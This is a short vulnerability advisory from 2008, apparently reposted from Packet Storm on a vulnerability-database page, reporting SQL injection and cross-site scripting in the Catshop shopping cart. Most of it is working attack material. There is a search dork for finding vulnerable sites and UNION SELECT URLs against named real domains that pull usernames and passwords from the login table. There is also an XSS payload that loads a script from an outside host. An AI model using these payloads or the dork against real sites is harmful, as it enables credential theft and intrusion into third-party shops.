Lucene search

catshop-sqlxss.txt

🗓️ 02 Jun 2008 00:00:00Reported by e.wiZz!Type

packetstorm🔗 packetstormsecurity.com👁 31 Views

Catshop Cart SQL Injection and XSS vulnerabilit

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`----------------------------------------------------  
  
Catshop Cart SQL Injection&XSS  
  
----------------------------------------------------  
  
/* INTRO /*  
  
  
By: e.wiZz!  
Info: It's not my fault 'coz i'm bosnian and unemployed. cheers  
Site: madspot.org  
mail: [email protected]  
  
/* OUTRO /*  
  
  
Script site: www.mns.it  
Info: Catshop is Shopping Cart developed by mns.it....other info is in italian,i can't translate and i don't care  
Dork: intext:"MNS Media & Net service" OR allinurl:/cat_shop/  
POC:  
  
SQL Injection:  
http://www.colferid.it/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*  
http://sidermetal.biz/cat_shop/viewProduct.php?id=-1+union+all+select+1,2,nick,pass,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+login/*  
  
XSS:  
http://colferid.it/cat_shop/viewProduct.php?id=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E  
  
  
  
  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

02 Jun 2008 00:00Current

7.4High risk

Vulners AI Score7.4